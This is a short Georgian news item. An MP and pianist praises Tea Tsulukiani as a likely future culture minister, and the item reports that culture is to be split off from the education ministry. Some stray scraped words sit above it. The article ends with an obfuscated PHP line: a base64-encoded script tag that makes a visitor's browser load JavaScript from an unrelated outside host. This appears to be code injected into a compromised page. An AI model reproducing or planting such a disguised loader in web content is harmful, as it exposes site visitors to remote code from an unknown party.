celsiusi
ავერსი შნაიდერი
“ქართული ოცნების” დეპუტატი, პიანისტი ელისო ბოლქვაძე ამბობს, რომ თეა წულუკიანი კულტურის მინისტრის პოსტზე “ბრწყინვალე” იქნება.
 
“თეა წულუკიანი იქნება ბრწყინვალე მინისტრი. იმიტომ რომ ძალიან პრინციპულია, ძალიან დიდ პატივს ვცემ ქალბატონ თეას.  რა თქმა უნდა [კვალიფიციური მინისტრი იქნება], რადგან არის უჭკვიანესი ადამიანი”, — განუცხადა ჟურნალისტებს ელისო ბოლქვაძემ.
 
თეა წულუკიანი იუსტიციის ყოფილი მინისტრი და ამჟამად პარლამენტის კულტურის, განათლებისა და მეცნიერების კომიტეტის თავმჯდომარეა. როგორც ცნობილია, კულტურის სამინისტროს განათლებისა და მეცნიერების სამინისტროსგან გამოყოფა იგეგმება.
 
“ქართულ ოცნებაში” ადასტურებენ, რომ კულუტურის მინისტრის თანამდებობაზე თეა წულუკიანის კანდიდატურა განიხილება, თუმცა გადაწყვეტილება ჯერ მიღებული არ არის.
1463
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");